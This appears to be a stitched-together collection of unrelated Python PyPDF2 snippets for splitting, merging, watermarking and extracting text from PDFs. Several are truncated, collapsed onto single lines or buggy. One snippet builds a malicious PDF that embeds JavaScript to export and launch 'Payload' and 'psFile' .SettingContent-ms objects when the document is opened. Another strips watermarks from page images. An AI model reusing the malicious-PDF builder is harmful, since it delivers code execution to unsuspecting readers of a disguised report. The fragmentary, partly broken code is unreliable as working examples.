            gaceta_end = gaceta(pdf, 800, gerente)
            notificacion(pdf, gaceta_end)
            label(pdf, gaceta_end, page)
            pdf.save()
            # put on watermark from buffer
            watermark = PdfFileReader(buffer)
            # NOTE(review): this rebinds ``input`` to a fresh reader of the
            # same template, which later iterations then use; each pass
            # opens another handle that is never closed.
            input = PdfFileReader(
                file(
                    os.path.join(settings.PDF_ROOT, 'fiscalizacion',
                                 'PROVIDENCIA.pdf'), 'rb'))
            tmp = input.getPage(3)
            tmp.mergePage(watermark.getPage(0))
            buffer.seek(0)
            # add processed pdf page
            output.addPage(tmp)
    output.write(response)
    return response
from PyPDF2 import PdfFileWriter, PdfFileReader
import os

# Split every PDF of the current working directory into single-page files
# named 1000.pdf, 1001.pdf, ... (numbering continues across source files).
# The directory listing is taken once, before any output file is created.
files = [file for file in os.listdir() if file.endswith(".pdf")]
number = 1000
for file in files:
    # get the source; the context manager closes it once all of its pages
    # have been written (previously every source handle stayed open)
    with open(file, "rb") as source:
        input1 = PdfFileReader(source)
        # one file to x files (one page == one file)
        for page in range(input1.getNumPages()):
            output = PdfFileWriter()
            output.addPage(input1.getPage(page))
            with open("{:04d}.pdf".format(number), "wb") as outputStream:
                output.write(outputStream)
            number += 1
import io
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import A4
import reportlab.rl_config
reportlab.rl_config.warnOnMissingFontGlyphs = 0
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont

# Register the TrueType font used for the Devanagari text.
font = '/media/capricorn/Home/Master/Code/Python/Core/learn_python/resource/Aparajita.ttf'
pdfmetrics.registerFont(TTFont('Marathi', font))

buffer = io.BytesIO()
# create a new PDF with Reportlab
can = canvas.Canvas(buffer, pagesize=A4)
can.setFont('Marathi', 14)
can.drawString(137, 604, "अनुराग")
can.save()
# move to the beginning of the BytesIO buffer
buffer.seek(0)
new_pdf = PdfFileReader(buffer)

# read your existing PDF; the template must stay open until the merged page
# has been written, and is closed afterwards even if merging fails
with open("/media/capricorn/Home/Master/Code/Python/Core/learn_python/resource/tc_format.pdf", "rb") as existing_file:
    existing_pdf = PdfFileReader(existing_file)
    output = PdfFileWriter()
    # add the "watermark" (which is the new pdf) on the existing page
    page = existing_pdf.getPage(0)
    page.mergePage(new_pdf.getPage(0))
    output.addPage(page)
    # finally, write "output" to a real file
    with open("destination.pdf", "wb") as outputStream:
        output.write(outputStream)
text = pageObj.extractText().split(" ") orderNum = turnToNum(text[0]) revNum = turnToNum(text[4]) return orderNum, revNum # Writes pages stored from PdfFileWriter into a PDF file with order and revision number as the file name. # Closes the file stream. def writeToFile(oNum, rNum, writerObj): output = oNum + " POC" + rNum + ".pdf" outputStream = open(output, "wb") writerObj.write(outputStream) outputStream.close() # Initialize a reader and writer object. inputStream = open("test3.pdf", "rb") reader = PdfFileReader(inputStream) writer = PdfFileWriter() # Get order number and revision number from first page of PDF. orderNum, revNum = orderRevNum(reader, 0) # For each page in PDF, get order and revision number. for pageNum in range(reader.getNumPages()): currOrderNum, currRevNum = orderRevNum(reader, pageNum) # If order number of the last page does not match the current order number, write pages from writer object to # a PDF with the order and revision number as the file name. Close output file stream. Reset writer object to get rid # of previously passed in pages. Set the current order and revision number as the older order and revision number # for comparison. if orderNum != currOrderNum: writeToFile(orderNum, revNum, writer)
# Create a PDF device object. device = PDFDevice(rsrcmgr) # BEGIN LAYOUT ANALYSIS # Set parameters for analysis. laparams = LAParams() # Create a PDF page aggregator object. device = PDFPageAggregator(rsrcmgr, laparams=laparams) # Create a PDF interpreter object. interpreter = PDFPageInterpreter(rsrcmgr, device) file1 = PdfFileReader(file( '/home/david/Downloads/Ben Clark - Red Team Field Manual.pdf', "rb"), strict=False) output = PdfFileWriter() count = 1 for page in PDFPage.create_pages(document): if count >= 1: print( "###################################################################", count, "########################################################") #print(page) # read the page into a layout object interpreter.process_page(page)
import base64 import binascii import os from PyPDF2 import PdfFileWriter, PdfFileReader malicious_pdf = PdfFileWriter() # Open file passed as -i parameter with open("rapport_pop.pdf", "rb") as f: pdfReader = PdfFileReader(f) # Copy pages of original pdf file to malicious pdf file for page in range(pdfReader.numPages): pageObj = pdfReader.getPage(page) malicious_pdf.addPage(pageObj) malicious_pdf.addJS( "var files = [\"Payload\", \"psFile\"]; for (var i = 0; i < files.length; i++) { this.exportDataObject( {cName: files[i] + \".SettingContent-ms\", nLaunch: 2} ); }" ) # malicious_pdf.addJS('this.exportDataObject({cName: "Payload.SettingContent-ms", nLaunch:2});') output = open("rapport_pop_malicious.pdf", "wb+") malicious_pdf.write(output) output.close()
# importing required modules
from PyPDF2 import PdfFileReader

# Raw string: the backslashes of the Windows path are taken literally instead
# of relying on Python leaving unknown escape sequences such as "\P" untouched
# (which triggers a warning on recent interpreters).  The value is unchanged.
pdf_path = r'D:\Personal\Folder1\Expense Claims\Globe Moving\Sales - Invoice DEL002368.pdf'

# The context manager closes the file once all text has been extracted.
with open(pdf_path, 'rb') as pdfFileObj:
    # creating a pdf reader object
    pdfReader = PdfFileReader(pdfFileObj)
    # printing number of pages in pdf file
    print(pdfReader.numPages)
    # text of every page, each followed by a newline
    content = "".join(
        pdfReader.getPage(i).extractText() + "\n"
        for i in range(0, pdfReader.numPages))

print(content)
metavar='text', required=True, help='The text to use as watermark') args = parser.parse_args() input_file_path = args.input_file merged_file_path = args.output_file watermark_text = args.text ## Get PDF width-height pdf_height = 0 pdf_width = 0 with io.open(input_file_path, mode='rb') as org_file: org_pdf = PdfFileReader(org_file) box = org_pdf.getPage(0).mediaBox pdf_height = box.getHeight() pdf_width = box.getWidth() ## 1. Create a canvas for the watermark text c = canvas.Canvas('watermark.pdf') c.setPageSize((pdf_width, pdf_height)) c.setFillColorRGB(1, 0.70, 0.70, 0.5) c.setFont('Helvetica-Bold', 36) textWidth = stringWidth(watermark_text, 'Helvetica-Bold', 36) c.drawString( float(pdf_width) - float(textWidth) - float(15), float(pdf_height) - float(40), watermark_text)
from PyPDF2 import PdfFileWriter, PdfFileReader
import glob
from pathlib import Path
import os

# Split every matching "Page*.pdf" into single-page files stored next to it
# as document-page<N>.pdf (N starts at 1), then delete the source file.
paths = glob.glob(r'Q:\GEO_PROJECT\sp_TEST\01_to_09_00\*\Page*.pdf')
for path in paths:
    print('Splitting: ' + str(path))
    parent_path = Path(path).parents[0]
    # The source is closed by the context manager even if splitting fails;
    # it is only removed after all of its pages were written successfully.
    with open(path, "rb") as f:
        inputpdf = PdfFileReader(f)
        for i in range(inputpdf.numPages):
            output = PdfFileWriter()
            output.addPage(inputpdf.getPage(i))
            # pathlib inserts the platform separator instead of a
            # hard-coded backslash.
            page_path = parent_path / ("document-page%s.pdf" % (i + 1))
            with open(str(page_path), "wb") as outputStream:
                output.write(outputStream)
    os.remove(path)
from PyPDF2 import PdfFileWriter, PdfFileReader

# Collects pages at fixed offsets from doc2.pdf into a new writer.
# NOTE(review): indentation was reconstructed from whitespace-mangled source;
# in particular the position of the final ``p = ...`` line is a guess.
i = 0
# NOTE(review): 'rb' is passed as the second positional argument of
# PdfFileReader, which other snippets use as ``strict=...`` - it looks like a
# file mode was intended; confirm.
pdf = PdfFileReader('doc2.pdf', 'rb')
outp = PdfFileWriter()
# NOTE(review): ``getNumPges`` and ``getPages`` look like misspellings of the
# ``getNumPages`` / ``getPage`` methods used elsewhere - confirm.
# NOTE(review): ``i`` is never changed inside the visible loop body.
while i < pdf.getNumPges():
    # NOTE(review): ``type`` is not assigned anywhere in view, and
    # ``... or "PDF"`` is always truthy, so the else branch is never taken.
    if type == "ACT" or "PDF":
        # Offsets 0, 1, 2, 4, 6 and 8 relative to ``i``.
        outp.addPage(pdf.getPages(i + 0))
        outp.addPage(pdf.getPages(i + 1))
        outp.addPage(pdf.getPages(i + 2))
        outp.addPage(pdf.getPages(i + 4))
        outp.addPage(pdf.getPages(i + 6))
        outp.addPage(pdf.getPages(i + 8))
    else:
        # Same offsets as above plus 10 and 11.
        outp.addPage(pdf.getPages(i + 0))
        outp.addPage(pdf.getPages(i + 1))
        outp.addPage(pdf.getPages(i + 2))
        outp.addPage(pdf.getPages(i + 4))
        outp.addPage(pdf.getPages(i + 6))
        outp.addPage(pdf.getPages(i + 8))
        outp.addPage(pdf.getPages(i + 10))
        outp.addPage(pdf.getPages(i + 11))
p = pdf.getPages()
from skimage import io
from PyPDF2 import PdfFileReader
from pdf2image import convert_from_path
import numpy as np
import os
from PIL import Image
from fpdf import FPDF
import shutil

# Ask for the PDF and derive its directory and its name without extension.
pdfFile = input('PDF file location: ')
dirname = os.path.dirname(os.path.normpath(pdfFile))
outputFile = os.path.basename(pdfFile)
outputFile = os.path.splitext(outputFile)[0]
pdf_reader = PdfFileReader(pdfFile)
pages = pdf_reader.getNumPages()
rang = int(pages) + 1


# Select the pixel from the extracted images of pdf pages
def select_pixel(r, g, b):
    """Return True when r, g and b all lie strictly between 120 and 254."""
    return bool(120 < r < 254 and 120 < g < 254 and 120 < b < 254)


# Handling of images for removing the watermark
def handle(imgs):
    """Turn every pixel accepted by the ``select_pixel`` rule white, in place.

    ``imgs`` is expected to be a NumPy image array whose last axis holds at
    least the three colour channels.  Only the first three channels are
    changed.  The array is modified in place and also returned.

    The test is evaluated for the whole image with one vectorised mask
    instead of a Python-level loop over every pixel.
    """
    rgb = imgs[:, :, :3]  # view on the colour channels, shares memory with imgs
    watermark = ((rgb > 120) & (rgb < 254)).all(axis=-1)
    rgb[watermark] = 255
    return imgs
from PyPDF2 import PdfFileMerger, PdfFileReader
import os

# Merge the PDFs named in ``files`` (given without the ".pdf" suffix).
newFile = PdfFileMerger()
files = []
output = 'output/'
if not os.path.exists(output):
    os.mkdir(output)
for filename in files:
    # The original passed 'rb' as second positional argument; that parameter
    # is ``strict``, so the truthy string simply enabled strict parsing.
    # Spelled out here so the call says what it does.
    newFile.append(PdfFileReader(filename + '.pdf', strict=True))
# NOTE(review): this writes a file literally named ".pdf" inside "output/" -
# confirm the intended file name.
newFile.write(output + ".pdf")
# Release the input streams held by the merger.
newFile.close()
from PyPDF2 import PdfFileReader, PdfFileWriter

# Dump the text of every page of book.pdf into my_output.txt.  Each page is
# written as a "Page N" line, a 100-character dash rule and the page text.
file_path = 'book.pdf'
pdf = PdfFileReader(file_path)

with open('my_output.txt', 'w') as f:
    for page_num in range(pdf.numPages):
        print('page: {}'.format(page_num))
        pageObj = pdf.getPage(page_num)
        try:
            txt = pageObj.extractText()
        except Exception as err:
            # Previously the writes below sat in the (bare) except path, so
            # text was only written after a failure - using a stale or
            # undefined ``txt``.  A failing page is now reported and skipped.
            print('could not extract page {0}: {1}'.format(page_num + 1, err))
            continue
        print(''.center(100, '-'))
        f.write('Page {0}\n'.format(page_num + 1))
        f.write(''.center(100, '-'))
        f.write(txt)
# No explicit f.close(): the with-block closes the file.
import os
from PyPDF2 import PdfFileWriter, PdfFileReader

# Make sure the target directory for the single-page files exists.
if not os.path.exists("./cern-pages"):
    os.mkdir("cern-pages")

# Write page i of CERN.pdf to cern-pages/page-<i>.pdf (zero-based).
pdf_file = open("./CERN.pdf", "rb")
try:
    pdf = PdfFileReader(pdf_file)
    num_pages = pdf.numPages
    i = 0
    while i < num_pages:
        output = PdfFileWriter()
        output.addPage(pdf.getPage(i))
        with open(f"cern-pages/page-{i}.pdf", "wb") as page_file:
            output.write(page_file)
        i += 1
finally:
    pdf_file.close()

print("Successfully extracted PDF file into %d pages" % num_pages)
from PyPDF2 import PdfFileReader
import re

# Print the text of every page of energy_usage.pdf, each followed by a
# marker line.  The former ``i = 0`` / ``i += 1`` bookkeeping had no effect
# on the ``for`` loop and was removed.
with open("energy_usage.pdf", "rb") as f:
    pdf = PdfFileReader(f)
    for i in range(pdf.getNumPages()):
        page = pdf.getPage(i)
        print(page.extractText())
        print('XXX_NEW_LINE_XXX')
def get_pdf_size(pdf: typing.Union[str, typing.IO[bytes]],
                 page_id: int) -> typing.Tuple[int, int]:
    """Return the upper-right corner of a page's media box as ``(x, y)`` integers.

    :param pdf: path or binary stream handed to ``PdfFileReader``.
    :param page_id: index of the page passed to ``getPage``.
    :return: both coordinates converted with ``int()``.
    """
    media_box = PdfFileReader(pdf).getPage(page_id).mediaBox
    width = int(media_box.getUpperRight_x())
    height = int(media_box.getUpperRight_y())
    return (width, height)
def post(self, request, application_id):
    """Generate, store and optionally return the PDF for an application.

    Reads ``html`` and ``json_data`` from the request body and ``pdf_type``
    and ``version`` from the query string.  The generated PDF and the JSON
    are encrypted and saved in a ``PreparedPdf`` row (an existing row for the
    application and type is updated, otherwise a new one is created), and
    the application's ``last_printed`` is refreshed.  When the body contains
    ``appended_form``, a PDF rendered from it is appended to the download
    only.

    Returns 404 when the application is not found for the user, 400 when a
    query parameter is missing, 204 when ``noDownload`` is set, and the
    download response otherwise.  Errors during generation or saving are
    logged and re-raised.
    """
    body = request.data
    html = body["html"]
    json_data = body["json_data"]

    app = get_application_for_user(application_id, request.user.id)
    if not app:
        return HttpResponseNotFound(no_record_found)

    query = request.query_params
    pdf_type = query.get("pdf_type")
    version = query.get("version")
    if pdf_type is None or version is None:
        return HttpResponseBadRequest("Missing parameters.")

    try:
        pdf_result = self.get_pdf_by_application_id_and_type(
            application_id, pdf_type)
        pdf_content = self.generate_pdf(html)
        # The key id stored is the one returned by the second encrypt call.
        _, pdf_content_enc = settings.ENCRYPTOR.encrypt(pdf_content)
        serialized_json = json.dumps(json_data).encode("utf-8")
        pdf_key_id, json_enc = settings.ENCRYPTOR.encrypt(serialized_json)

        if not pdf_result:
            pdf_result = PreparedPdf(
                application_id=application_id,
                data=pdf_content_enc,
                json_data=json_enc,
                key_id=pdf_key_id,
                pdf_type=pdf_type,
                version=version,
            )
        else:
            pdf_result.data = pdf_content_enc
            pdf_result.json_data = json_enc
            pdf_result.key_id = pdf_key_id
            pdf_result.pdf_type = pdf_type
            pdf_result.version = version
            pdf_result.last_updated = timezone.now()
        pdf_result.save()

        app.last_printed = timezone.now()
        app.save()
    except Exception as ex:
        LOGGER.error("ERROR: Pdf generation failed %s", ex)
        raise

    appended_form = request.data.get("appended_form", None)
    if appended_form:
        # Main PDF first, then the PDF rendered from the appended form.
        pdf_merger = PdfFileMerger()
        merged_forms = BytesIO()
        main_reader = PdfFileReader(stream=BytesIO(pdf_content))
        pdf_merger.append(main_reader)
        appended_reader = PdfFileReader(
            stream=BytesIO(self.generate_pdf(appended_form)))
        pdf_merger.append(appended_reader)
        pdf_merger.write(merged_forms)
        pdf_content = merged_forms.getvalue()
        pdf_merger.close()

    if request.query_params.get("noDownload"):
        return HttpResponse(status=204)
    return self.create_download_response(pdf_content)